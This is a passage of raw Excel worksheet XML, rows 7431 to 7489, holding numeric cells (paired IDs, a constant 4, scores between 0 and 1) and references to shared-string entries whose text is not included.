        <v>5664</v>
      </c>
      <c r="C7431">
        <v>5664</v>
      </c>
      <c r="D7431">
        <v>4</v>
      </c>
      <c r="E7431">
        <v>0.40299999713897711</v>
      </c>
      <c r="F7431" t="s">
        <v>13461</v>
      </c>
      <c r="G7431" t="s">
        <v>14703</v>
      </c>
      <c r="H7431" t="s">
        <v>14704</v>
      </c>
    </row>
    <row r="7432" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7432" s="1">
        <v>7430</v>
      </c>
      <c r="B7432">
        <v>5663</v>
      </c>
      <c r="C7432">
        <v>5663</v>
      </c>
      <c r="D7432">
        <v>4</v>
      </c>
      <c r="E7432">
        <v>0.93889999389648438</v>
      </c>
      <c r="F7432" t="s">
        <v>13461</v>
      </c>
      <c r="G7432" t="s">
        <v>14705</v>
      </c>
      <c r="H7432" t="s">
        <v>14706</v>
      </c>
    </row>
    <row r="7433" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7433" s="1">
        <v>7431</v>
      </c>
      <c r="B7433">
        <v>5394</v>
      </c>
      <c r="C7433">
        <v>5394</v>
      </c>
      <c r="D7433">
        <v>4</v>
      </c>
      <c r="E7433">
        <v>0.99699997901916504</v>
      </c>
      <c r="F7433" t="s">
        <v>13461</v>
      </c>
      <c r="G7433" t="s">
        <v>14707</v>
      </c>
      <c r="H7433" t="s">
        <v>14708</v>
      </c>
    </row>
    <row r="7434" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7434" s="1">
        <v>7432</v>
      </c>
      <c r="B7434">
        <v>5659</v>
      </c>
      <c r="C7434">
        <v>5659</v>
      </c>
      <c r="D7434">
        <v>4</v>
      </c>
      <c r="E7434">
        <v>0.96520000696182251</v>
      </c>
      <c r="F7434" t="s">
        <v>13461</v>
      </c>
      <c r="G7434" t="s">
        <v>14709</v>
      </c>
      <c r="H7434" t="s">
        <v>14710</v>
      </c>
    </row>
    <row r="7435" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7435" s="1">
        <v>7433</v>
      </c>
      <c r="B7435">
        <v>5399</v>
      </c>
      <c r="C7435">
        <v>5399</v>
      </c>
      <c r="D7435">
        <v>4</v>
      </c>
      <c r="E7435">
        <v>0.99470001459121704</v>
      </c>
      <c r="F7435" t="s">
        <v>13461</v>
      </c>
      <c r="G7435" t="s">
        <v>14711</v>
      </c>
      <c r="H7435" t="s">
        <v>14712</v>
      </c>
    </row>
    <row r="7436" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7436" s="1">
        <v>7434</v>
      </c>
      <c r="B7436">
        <v>5402</v>
      </c>
      <c r="C7436">
        <v>5402</v>
      </c>
      <c r="D7436">
        <v>4</v>
      </c>
      <c r="E7436">
        <v>0.78769999742507935</v>
      </c>
      <c r="F7436" t="s">
        <v>13461</v>
      </c>
      <c r="G7436" t="s">
        <v>14713</v>
      </c>
      <c r="H7436" t="s">
        <v>14714</v>
      </c>
    </row>
    <row r="7437" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7437" s="1">
        <v>7435</v>
      </c>
      <c r="B7437">
        <v>5650</v>
      </c>
      <c r="C7437">
        <v>5650</v>
      </c>
      <c r="D7437">
        <v>4</v>
      </c>
      <c r="E7437">
        <v>0.99690002202987671</v>
      </c>
      <c r="F7437" t="s">
        <v>13461</v>
      </c>
      <c r="G7437" t="s">
        <v>14715</v>
      </c>
      <c r="H7437" t="s">
        <v>14716</v>
      </c>
    </row>
    <row r="7438" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7438" s="1">
        <v>7436</v>
      </c>
      <c r="B7438">
        <v>5649</v>
      </c>
      <c r="C7438">
        <v>5649</v>
      </c>
      <c r="D7438">
        <v>4</v>
      </c>
      <c r="E7438">
        <v>0.78250002861022949</v>
      </c>
      <c r="F7438" t="s">
        <v>13461</v>
      </c>
      <c r="G7438" t="s">
        <v>14717</v>
      </c>
      <c r="H7438" t="s">
        <v>14718</v>
      </c>
    </row>
    <row r="7439" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7439" s="1">
        <v>7437</v>
      </c>
      <c r="B7439">
        <v>5648</v>
      </c>
      <c r="C7439">
        <v>5648</v>
      </c>
      <c r="D7439">
        <v>4</v>
      </c>
      <c r="E7439">
        <v>0.96749997138977051</v>
      </c>
      <c r="F7439" t="s">
        <v>13461</v>
      </c>
      <c r="G7439" t="s">
        <v>14719</v>
      </c>
      <c r="H7439" t="s">
        <v>14720</v>
      </c>
    </row>
    <row r="7440" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7440" s="1">
        <v>7438</v>
      </c>
      <c r="B7440">
        <v>5454</v>
      </c>
      <c r="C7440">
        <v>5454</v>
      </c>
      <c r="D7440">
        <v>4</v>
      </c>
      <c r="E7440">
        <v>0.65399998426437378</v>
      </c>
      <c r="F7440" t="s">
        <v>13461</v>
      </c>
      <c r="G7440" t="s">
        <v>14721</v>
      </c>
      <c r="H7440" t="s">
        <v>14722</v>
      </c>
    </row>
    <row r="7441" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7441" s="1">
        <v>7439</v>
      </c>
      <c r="B7441">
        <v>5419</v>
      </c>
      <c r="C7441">
        <v>5419</v>
      </c>
      <c r="D7441">
        <v>4</v>
      </c>
      <c r="E7441">
        <v>0.47290000319480902</v>
      </c>
      <c r="F7441" t="s">
        <v>13461</v>
      </c>
      <c r="G7441" t="s">
        <v>14723</v>
      </c>
      <c r="H7441" t="s">
        <v>14724</v>
      </c>
    </row>
    <row r="7442" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7442" s="1">
        <v>7440</v>
      </c>
      <c r="B7442">
        <v>5642</v>
      </c>
      <c r="C7442">
        <v>5642</v>
      </c>
      <c r="D7442">
        <v>4</v>
      </c>
      <c r="E7442">
        <v>0.680899977684021</v>
      </c>
      <c r="F7442" t="s">
        <v>13461</v>
      </c>
      <c r="G7442" t="s">
        <v>14725</v>
      </c>
      <c r="H7442" t="s">
        <v>14726</v>
      </c>
    </row>
    <row r="7443" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7443" s="1">
        <v>7441</v>
      </c>
      <c r="B7443">
        <v>5641</v>
      </c>
      <c r="C7443">
        <v>5641</v>
      </c>
      <c r="D7443">
        <v>4</v>
      </c>
      <c r="E7443">
        <v>0.82130002975463867</v>
      </c>
      <c r="F7443" t="s">
        <v>13461</v>
      </c>
      <c r="G7443" t="s">
        <v>14727</v>
      </c>
      <c r="H7443" t="s">
        <v>14728</v>
      </c>
    </row>
    <row r="7444" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7444" s="1">
        <v>7442</v>
      </c>
      <c r="B7444">
        <v>5435</v>
      </c>
      <c r="C7444">
        <v>5435</v>
      </c>
      <c r="D7444">
        <v>4</v>
      </c>
      <c r="E7444">
        <v>0.98119997978210449</v>
      </c>
      <c r="F7444" t="s">
        <v>13461</v>
      </c>
      <c r="G7444" t="s">
        <v>14729</v>
      </c>
      <c r="H7444" t="s">
        <v>14730</v>
      </c>
    </row>
    <row r="7445" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7445" s="1">
        <v>7443</v>
      </c>
      <c r="B7445">
        <v>5637</v>
      </c>
      <c r="C7445">
        <v>5637</v>
      </c>
      <c r="D7445">
        <v>4</v>
      </c>
      <c r="E7445">
        <v>0.71369999647140503</v>
      </c>
      <c r="F7445" t="s">
        <v>13461</v>
      </c>
      <c r="G7445" t="s">
        <v>14731</v>
      </c>
      <c r="H7445" t="s">
        <v>14732</v>
      </c>
    </row>
    <row r="7446" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7446" s="1">
        <v>7444</v>
      </c>
      <c r="B7446">
        <v>5439</v>
      </c>
      <c r="C7446">
        <v>5439</v>
      </c>
      <c r="D7446">
        <v>4</v>
      </c>
      <c r="E7446">
        <v>0.78210002183914185</v>
      </c>
      <c r="F7446" t="s">
        <v>13461</v>
      </c>
      <c r="G7446" t="s">
        <v>14733</v>
      </c>
      <c r="H7446" t="s">
        <v>14734</v>
      </c>
    </row>
    <row r="7447" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7447" s="1">
        <v>7445</v>
      </c>
      <c r="B7447">
        <v>5634</v>
      </c>
      <c r="C7447">
        <v>5634</v>
      </c>
      <c r="D7447">
        <v>4</v>
      </c>
      <c r="E7447">
        <v>0.60680001974105835</v>
      </c>
      <c r="F7447" t="s">
        <v>13461</v>
      </c>
      <c r="G7447" t="s">
        <v>14735</v>
      </c>
      <c r="H7447" t="s">
        <v>14736</v>
      </c>
    </row>
    <row r="7448" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7448" s="1">
        <v>7446</v>
      </c>
      <c r="B7448">
        <v>5633</v>
      </c>
      <c r="C7448">
        <v>5633</v>
      </c>
      <c r="D7448">
        <v>4</v>
      </c>
      <c r="E7448">
        <v>0.32010000944137568</v>
      </c>
      <c r="F7448" t="s">
        <v>13461</v>
      </c>
      <c r="G7448" t="s">
        <v>14737</v>
      </c>
      <c r="H7448" t="s">
        <v>14738</v>
      </c>
    </row>
    <row r="7449" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7449" s="1">
        <v>7447</v>
      </c>
      <c r="B7449">
        <v>5449</v>
      </c>
      <c r="C7449">
        <v>5449</v>
      </c>
      <c r="D7449">
        <v>4</v>
      </c>
      <c r="E7449">
        <v>0.97909998893737793</v>
      </c>
      <c r="F7449" t="s">
        <v>13461</v>
      </c>
      <c r="G7449" t="s">
        <v>14739</v>
      </c>
      <c r="H7449" t="s">
        <v>14740</v>
      </c>
    </row>
    <row r="7450" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7450" s="1">
        <v>7448</v>
      </c>
      <c r="B7450">
        <v>5451</v>
      </c>
      <c r="C7450">
        <v>5451</v>
      </c>
      <c r="D7450">
        <v>4</v>
      </c>
      <c r="E7450">
        <v>0.65530002117156982</v>
      </c>
      <c r="F7450" t="s">
        <v>13461</v>
      </c>
      <c r="G7450" t="s">
        <v>14741</v>
      </c>
      <c r="H7450" t="s">
        <v>14742</v>
      </c>
    </row>
    <row r="7451" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7451" s="1">
        <v>7449</v>
      </c>
      <c r="B7451">
        <v>5643</v>
      </c>
      <c r="C7451">
        <v>5643</v>
      </c>
      <c r="D7451">
        <v>4</v>
      </c>
      <c r="E7451">
        <v>0.71350002288818359</v>
      </c>
      <c r="F7451" t="s">
        <v>13461</v>
      </c>
      <c r="G7451" t="s">
        <v>14743</v>
      </c>
      <c r="H7451" t="s">
        <v>14732</v>
      </c>
    </row>
    <row r="7452" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7452" s="1">
        <v>7450</v>
      </c>
      <c r="B7452">
        <v>5988</v>
      </c>
      <c r="C7452">
        <v>5988</v>
      </c>
      <c r="D7452">
        <v>4</v>
      </c>
      <c r="E7452">
        <v>0.51800000667572021</v>
      </c>
      <c r="F7452" t="s">
        <v>13461</v>
      </c>
      <c r="G7452" t="s">
        <v>14744</v>
      </c>
      <c r="H7452" t="s">
        <v>14745</v>
      </c>
    </row>
    <row r="7453" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7453" s="1">
        <v>7451</v>
      </c>
      <c r="B7453">
        <v>5102</v>
      </c>
      <c r="C7453">
        <v>5102</v>
      </c>
      <c r="D7453">
        <v>4</v>
      </c>
      <c r="E7453">
        <v>0.82590001821517944</v>
      </c>
      <c r="F7453" t="s">
        <v>13461</v>
      </c>
      <c r="G7453" t="s">
        <v>14746</v>
      </c>
      <c r="H7453" t="s">
        <v>14747</v>
      </c>
    </row>
    <row r="7454" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7454" s="1">
        <v>7452</v>
      </c>
      <c r="B7454">
        <v>5078</v>
      </c>
      <c r="C7454">
        <v>5078</v>
      </c>
      <c r="D7454">
        <v>4</v>
      </c>
      <c r="E7454">
        <v>0.42980000376701349</v>
      </c>
      <c r="F7454" t="s">
        <v>13461</v>
      </c>
      <c r="G7454" t="s">
        <v>14748</v>
      </c>
      <c r="H7454" t="s">
        <v>14690</v>
      </c>
    </row>
    <row r="7455" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7455" s="1">
        <v>7453</v>
      </c>
      <c r="B7455">
        <v>5933</v>
      </c>
      <c r="C7455">
        <v>5933</v>
      </c>
      <c r="D7455">
        <v>4</v>
      </c>
      <c r="E7455">
        <v>0.49039998650550842</v>
      </c>
      <c r="F7455" t="s">
        <v>13461</v>
      </c>
      <c r="G7455" t="s">
        <v>14749</v>
      </c>
      <c r="H7455" t="s">
        <v>14750</v>
      </c>
    </row>
    <row r="7456" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7456" s="1">
        <v>7454</v>
      </c>
      <c r="B7456">
        <v>5932</v>
      </c>
      <c r="C7456">
        <v>5932</v>
      </c>
      <c r="D7456">
        <v>4</v>
      </c>
      <c r="E7456">
        <v>0.94840002059936523</v>
      </c>
      <c r="F7456" t="s">
        <v>13461</v>
      </c>
      <c r="G7456" t="s">
        <v>14751</v>
      </c>
      <c r="H7456" t="s">
        <v>14752</v>
      </c>
    </row>
    <row r="7457" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7457" s="1">
        <v>7455</v>
      </c>
      <c r="B7457">
        <v>5931</v>
      </c>
      <c r="C7457">
        <v>5931</v>
      </c>
      <c r="D7457">
        <v>4</v>
      </c>
      <c r="E7457">
        <v>0.99419999122619629</v>
      </c>
      <c r="F7457" t="s">
        <v>13461</v>
      </c>
      <c r="G7457" t="s">
        <v>14753</v>
      </c>
      <c r="H7457" t="s">
        <v>14754</v>
      </c>
    </row>
    <row r="7458" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7458" s="1">
        <v>7456</v>
      </c>
      <c r="B7458">
        <v>4657</v>
      </c>
      <c r="C7458">
        <v>4657</v>
      </c>
      <c r="D7458">
        <v>4</v>
      </c>
      <c r="E7458">
        <v>0.81309998035430908</v>
      </c>
      <c r="F7458" t="s">
        <v>13461</v>
      </c>
      <c r="G7458" t="s">
        <v>14755</v>
      </c>
      <c r="H7458" t="s">
        <v>14756</v>
      </c>
    </row>
    <row r="7459" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7459" s="1">
        <v>7457</v>
      </c>
      <c r="B7459">
        <v>5925</v>
      </c>
      <c r="C7459">
        <v>5925</v>
      </c>
      <c r="D7459">
        <v>4</v>
      </c>
      <c r="E7459">
        <v>0.73079997301101685</v>
      </c>
      <c r="F7459" t="s">
        <v>13461</v>
      </c>
      <c r="G7459" t="s">
        <v>14757</v>
      </c>
      <c r="H7459" t="s">
        <v>14758</v>
      </c>
    </row>
    <row r="7460" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7460" s="1">
        <v>7458</v>
      </c>
      <c r="B7460">
        <v>4691</v>
      </c>
      <c r="C7460">
        <v>4691</v>
      </c>
      <c r="D7460">
        <v>4</v>
      </c>
      <c r="E7460">
        <v>0.58840000629425049</v>
      </c>
      <c r="F7460" t="s">
        <v>13461</v>
      </c>
      <c r="G7460" t="s">
        <v>14759</v>
      </c>
      <c r="H7460" t="s">
        <v>14760</v>
      </c>
    </row>
    <row r="7461" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7461" s="1">
        <v>7459</v>
      </c>
      <c r="B7461">
        <v>4692</v>
      </c>
      <c r="C7461">
        <v>4692</v>
      </c>
      <c r="D7461">
        <v>4</v>
      </c>
      <c r="E7461">
        <v>0.4293999969959259</v>
      </c>
      <c r="F7461" t="s">
        <v>13461</v>
      </c>
      <c r="G7461" t="s">
        <v>14761</v>
      </c>
      <c r="H7461" t="s">
        <v>14762</v>
      </c>
    </row>
    <row r="7462" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7462" s="1">
        <v>7460</v>
      </c>
      <c r="B7462">
        <v>4697</v>
      </c>
      <c r="C7462">
        <v>4697</v>
      </c>
      <c r="D7462">
        <v>4</v>
      </c>
      <c r="E7462">
        <v>0.55190002918243408</v>
      </c>
      <c r="F7462" t="s">
        <v>13461</v>
      </c>
      <c r="G7462" t="s">
        <v>14763</v>
      </c>
      <c r="H7462" t="s">
        <v>14764</v>
      </c>
    </row>
    <row r="7463" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7463" s="1">
        <v>7461</v>
      </c>
      <c r="B7463">
        <v>5919</v>
      </c>
      <c r="C7463">
        <v>5919</v>
      </c>
      <c r="D7463">
        <v>4</v>
      </c>
      <c r="E7463">
        <v>0.52619999647140503</v>
      </c>
      <c r="F7463" t="s">
        <v>13461</v>
      </c>
      <c r="G7463" t="s">
        <v>14765</v>
      </c>
      <c r="H7463" t="s">
        <v>14766</v>
      </c>
    </row>
    <row r="7464" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7464" s="1">
        <v>7462</v>
      </c>
      <c r="B7464">
        <v>4655</v>
      </c>
      <c r="C7464">
        <v>4655</v>
      </c>
      <c r="D7464">
        <v>4</v>
      </c>
      <c r="E7464">
        <v>0.95819997787475586</v>
      </c>
      <c r="F7464" t="s">
        <v>13461</v>
      </c>
      <c r="G7464" t="s">
        <v>14767</v>
      </c>
      <c r="H7464" t="s">
        <v>14768</v>
      </c>
    </row>
    <row r="7465" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7465" s="1">
        <v>7463</v>
      </c>
      <c r="B7465">
        <v>5917</v>
      </c>
      <c r="C7465">
        <v>5917</v>
      </c>
      <c r="D7465">
        <v>4</v>
      </c>
      <c r="E7465">
        <v>0.99379998445510864</v>
      </c>
      <c r="F7465" t="s">
        <v>13461</v>
      </c>
      <c r="G7465" t="s">
        <v>14769</v>
      </c>
      <c r="H7465" t="s">
        <v>14770</v>
      </c>
    </row>
    <row r="7466" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7466" s="1">
        <v>7464</v>
      </c>
      <c r="B7466">
        <v>4715</v>
      </c>
      <c r="C7466">
        <v>4715</v>
      </c>
      <c r="D7466">
        <v>4</v>
      </c>
      <c r="E7466">
        <v>0.5275999903678894</v>
      </c>
      <c r="F7466" t="s">
        <v>13461</v>
      </c>
      <c r="G7466" t="s">
        <v>14771</v>
      </c>
      <c r="H7466" t="s">
        <v>14772</v>
      </c>
    </row>
    <row r="7467" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7467" s="1">
        <v>7465</v>
      </c>
      <c r="B7467">
        <v>4716</v>
      </c>
      <c r="C7467">
        <v>4716</v>
      </c>
      <c r="D7467">
        <v>4</v>
      </c>
      <c r="E7467">
        <v>0.54140001535415649</v>
      </c>
      <c r="F7467" t="s">
        <v>13461</v>
      </c>
      <c r="G7467" t="s">
        <v>14773</v>
      </c>
      <c r="H7467" t="s">
        <v>14774</v>
      </c>
    </row>
    <row r="7468" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7468" s="1">
        <v>7466</v>
      </c>
      <c r="B7468">
        <v>4717</v>
      </c>
      <c r="C7468">
        <v>4717</v>
      </c>
      <c r="D7468">
        <v>4</v>
      </c>
      <c r="E7468">
        <v>0.66299998760223389</v>
      </c>
      <c r="F7468" t="s">
        <v>13461</v>
      </c>
      <c r="G7468" t="s">
        <v>14775</v>
      </c>
      <c r="H7468" t="s">
        <v>14776</v>
      </c>
    </row>
    <row r="7469" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7469" s="1">
        <v>7467</v>
      </c>
      <c r="B7469">
        <v>4728</v>
      </c>
      <c r="C7469">
        <v>4728</v>
      </c>
      <c r="D7469">
        <v>4</v>
      </c>
      <c r="E7469">
        <v>0.82340002059936523</v>
      </c>
      <c r="F7469" t="s">
        <v>13461</v>
      </c>
      <c r="G7469" t="s">
        <v>14777</v>
      </c>
      <c r="H7469" t="s">
        <v>14778</v>
      </c>
    </row>
    <row r="7470" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7470" s="1">
        <v>7468</v>
      </c>
      <c r="B7470">
        <v>4731</v>
      </c>
      <c r="C7470">
        <v>4731</v>
      </c>
      <c r="D7470">
        <v>4</v>
      </c>
      <c r="E7470">
        <v>0.60570001602172852</v>
      </c>
      <c r="F7470" t="s">
        <v>13461</v>
      </c>
      <c r="G7470" t="s">
        <v>14779</v>
      </c>
      <c r="H7470" t="s">
        <v>14780</v>
      </c>
    </row>
    <row r="7471" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7471" s="1">
        <v>7469</v>
      </c>
      <c r="B7471">
        <v>4732</v>
      </c>
      <c r="C7471">
        <v>4732</v>
      </c>
      <c r="D7471">
        <v>4</v>
      </c>
      <c r="E7471">
        <v>0.52910000085830688</v>
      </c>
      <c r="F7471" t="s">
        <v>13461</v>
      </c>
      <c r="G7471" t="s">
        <v>14781</v>
      </c>
      <c r="H7471" t="s">
        <v>14782</v>
      </c>
    </row>
    <row r="7472" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7472" s="1">
        <v>7470</v>
      </c>
      <c r="B7472">
        <v>4736</v>
      </c>
      <c r="C7472">
        <v>4736</v>
      </c>
      <c r="D7472">
        <v>4</v>
      </c>
      <c r="E7472">
        <v>0.50929999351501465</v>
      </c>
      <c r="F7472" t="s">
        <v>13461</v>
      </c>
      <c r="G7472" t="s">
        <v>14783</v>
      </c>
      <c r="H7472" t="s">
        <v>14784</v>
      </c>
    </row>
    <row r="7473" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7473" s="1">
        <v>7471</v>
      </c>
      <c r="B7473">
        <v>4740</v>
      </c>
      <c r="C7473">
        <v>4740</v>
      </c>
      <c r="D7473">
        <v>4</v>
      </c>
      <c r="E7473">
        <v>0.98040002584457397</v>
      </c>
      <c r="F7473" t="s">
        <v>13461</v>
      </c>
      <c r="G7473" t="s">
        <v>14785</v>
      </c>
      <c r="H7473" t="s">
        <v>14786</v>
      </c>
    </row>
    <row r="7474" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7474" s="1">
        <v>7472</v>
      </c>
      <c r="B7474">
        <v>4765</v>
      </c>
      <c r="C7474">
        <v>4765</v>
      </c>
      <c r="D7474">
        <v>4</v>
      </c>
      <c r="E7474">
        <v>0.87290000915527344</v>
      </c>
      <c r="F7474" t="s">
        <v>13461</v>
      </c>
      <c r="G7474" t="s">
        <v>14787</v>
      </c>
      <c r="H7474" t="s">
        <v>14788</v>
      </c>
    </row>
    <row r="7475" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7475" s="1">
        <v>7473</v>
      </c>
      <c r="B7475">
        <v>4702</v>
      </c>
      <c r="C7475">
        <v>4702</v>
      </c>
      <c r="D7475">
        <v>4</v>
      </c>
      <c r="E7475">
        <v>0.633899986743927</v>
      </c>
      <c r="F7475" t="s">
        <v>13461</v>
      </c>
      <c r="G7475" t="s">
        <v>14789</v>
      </c>
      <c r="H7475" t="s">
        <v>14790</v>
      </c>
    </row>
    <row r="7476" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7476" s="1">
        <v>7474</v>
      </c>
      <c r="B7476">
        <v>4783</v>
      </c>
      <c r="C7476">
        <v>4783</v>
      </c>
      <c r="D7476">
        <v>4</v>
      </c>
      <c r="E7476">
        <v>0.84060001373291016</v>
      </c>
      <c r="F7476" t="s">
        <v>13461</v>
      </c>
      <c r="G7476" t="s">
        <v>14791</v>
      </c>
      <c r="H7476" t="s">
        <v>14792</v>
      </c>
    </row>
    <row r="7477" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7477" s="1">
        <v>7475</v>
      </c>
      <c r="B7477">
        <v>4641</v>
      </c>
      <c r="C7477">
        <v>4641</v>
      </c>
      <c r="D7477">
        <v>4</v>
      </c>
      <c r="E7477">
        <v>0.49900001287460333</v>
      </c>
      <c r="F7477" t="s">
        <v>13461</v>
      </c>
      <c r="G7477" t="s">
        <v>14793</v>
      </c>
      <c r="H7477" t="s">
        <v>14794</v>
      </c>
    </row>
    <row r="7478" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7478" s="1">
        <v>7476</v>
      </c>
      <c r="B7478">
        <v>4625</v>
      </c>
      <c r="C7478">
        <v>4625</v>
      </c>
      <c r="D7478">
        <v>4</v>
      </c>
      <c r="E7478">
        <v>0.51840001344680786</v>
      </c>
      <c r="F7478" t="s">
        <v>13461</v>
      </c>
      <c r="G7478" t="s">
        <v>14795</v>
      </c>
      <c r="H7478" t="s">
        <v>14796</v>
      </c>
    </row>
    <row r="7479" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7479" s="1">
        <v>7477</v>
      </c>
      <c r="B7479">
        <v>4528</v>
      </c>
      <c r="C7479">
        <v>4528</v>
      </c>
      <c r="D7479">
        <v>4</v>
      </c>
      <c r="E7479">
        <v>0.56110000610351563</v>
      </c>
      <c r="F7479" t="s">
        <v>13461</v>
      </c>
      <c r="G7479" t="s">
        <v>14797</v>
      </c>
      <c r="H7479" t="s">
        <v>14798</v>
      </c>
    </row>
    <row r="7480" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7480" s="1">
        <v>7478</v>
      </c>
      <c r="B7480">
        <v>5984</v>
      </c>
      <c r="C7480">
        <v>5984</v>
      </c>
      <c r="D7480">
        <v>4</v>
      </c>
      <c r="E7480">
        <v>0.73309999704360962</v>
      </c>
      <c r="F7480" t="s">
        <v>13461</v>
      </c>
      <c r="G7480" t="s">
        <v>14799</v>
      </c>
      <c r="H7480" t="s">
        <v>14800</v>
      </c>
    </row>
    <row r="7481" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7481" s="1">
        <v>7479</v>
      </c>
      <c r="B7481">
        <v>5983</v>
      </c>
      <c r="C7481">
        <v>5983</v>
      </c>
      <c r="D7481">
        <v>4</v>
      </c>
      <c r="E7481">
        <v>0.69739997386932373</v>
      </c>
      <c r="F7481" t="s">
        <v>13461</v>
      </c>
      <c r="G7481" t="s">
        <v>14801</v>
      </c>
      <c r="H7481" t="s">
        <v>14802</v>
      </c>
    </row>
    <row r="7482" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7482" s="1">
        <v>7480</v>
      </c>
      <c r="B7482">
        <v>4530</v>
      </c>
      <c r="C7482">
        <v>4530</v>
      </c>
      <c r="D7482">
        <v>4</v>
      </c>
      <c r="E7482">
        <v>0.88470000028610229</v>
      </c>
      <c r="F7482" t="s">
        <v>13461</v>
      </c>
      <c r="G7482" t="s">
        <v>14803</v>
      </c>
      <c r="H7482" t="s">
        <v>14804</v>
      </c>
    </row>
    <row r="7483" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7483" s="1">
        <v>7481</v>
      </c>
      <c r="B7483">
        <v>4534</v>
      </c>
      <c r="C7483">
        <v>4534</v>
      </c>
      <c r="D7483">
        <v>4</v>
      </c>
      <c r="E7483">
        <v>0.6381000280380249</v>
      </c>
      <c r="F7483" t="s">
        <v>13461</v>
      </c>
      <c r="G7483" t="s">
        <v>14805</v>
      </c>
      <c r="H7483" t="s">
        <v>14806</v>
      </c>
    </row>
    <row r="7484" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7484" s="1">
        <v>7482</v>
      </c>
      <c r="B7484">
        <v>4540</v>
      </c>
      <c r="C7484">
        <v>4540</v>
      </c>
      <c r="D7484">
        <v>4</v>
      </c>
      <c r="E7484">
        <v>0.71359997987747192</v>
      </c>
      <c r="F7484" t="s">
        <v>13461</v>
      </c>
      <c r="G7484" t="s">
        <v>14807</v>
      </c>
      <c r="H7484" t="s">
        <v>14808</v>
      </c>
    </row>
    <row r="7485" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7485" s="1">
        <v>7483</v>
      </c>
      <c r="B7485">
        <v>5977</v>
      </c>
      <c r="C7485">
        <v>5977</v>
      </c>
      <c r="D7485">
        <v>4</v>
      </c>
      <c r="E7485">
        <v>0.99409997463226318</v>
      </c>
      <c r="F7485" t="s">
        <v>13461</v>
      </c>
      <c r="G7485" t="s">
        <v>14809</v>
      </c>
      <c r="H7485" t="s">
        <v>14810</v>
      </c>
    </row>
    <row r="7486" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7486" s="1">
        <v>7484</v>
      </c>
      <c r="B7486">
        <v>4556</v>
      </c>
      <c r="C7486">
        <v>4556</v>
      </c>
      <c r="D7486">
        <v>4</v>
      </c>
      <c r="E7486">
        <v>0.59079998731613159</v>
      </c>
      <c r="F7486" t="s">
        <v>13461</v>
      </c>
      <c r="G7486" t="s">
        <v>14811</v>
      </c>
      <c r="H7486" t="s">
        <v>14812</v>
      </c>
    </row>
    <row r="7487" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7487" s="1">
        <v>7485</v>
      </c>
      <c r="B7487">
        <v>4562</v>
      </c>
      <c r="C7487">
        <v>4562</v>
      </c>
      <c r="D7487">
        <v>4</v>
      </c>
      <c r="E7487">
        <v>0.59210002422332764</v>
      </c>
      <c r="F7487" t="s">
        <v>13461</v>
      </c>
      <c r="G7487" t="s">
        <v>14813</v>
      </c>
      <c r="H7487" t="s">
        <v>14814</v>
      </c>
    </row>
    <row r="7488" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7488" s="1">
        <v>7486</v>
      </c>
      <c r="B7488">
        <v>4638</v>
      </c>
      <c r="C7488">
        <v>4638</v>
      </c>
      <c r="D7488">
        <v>4</v>
      </c>
      <c r="E7488">
        <v>0.99519997835159302</v>
      </c>
      <c r="F7488" t="s">
        <v>13461</v>
      </c>
      <c r="G7488" t="s">
        <v>14815</v>
      </c>
      <c r="H7488" t="s">
        <v>14816</v>
      </c>
    </row>
    <row r="7489" spans="1:8" x14ac:dyDescent="0.45">
      <c r="A7489" s="1">
        <v>7487</v>
      </c>
      <c r="B7489">
        <v>5962</v>
      </c>
      <c r="C7489">
        <v>5962</v>
      </c>
      <c r="D7489">
        <v>4</v>
      </c>
      <c r="E7489">
        <v>0.63179999589920044</v>
      </c>
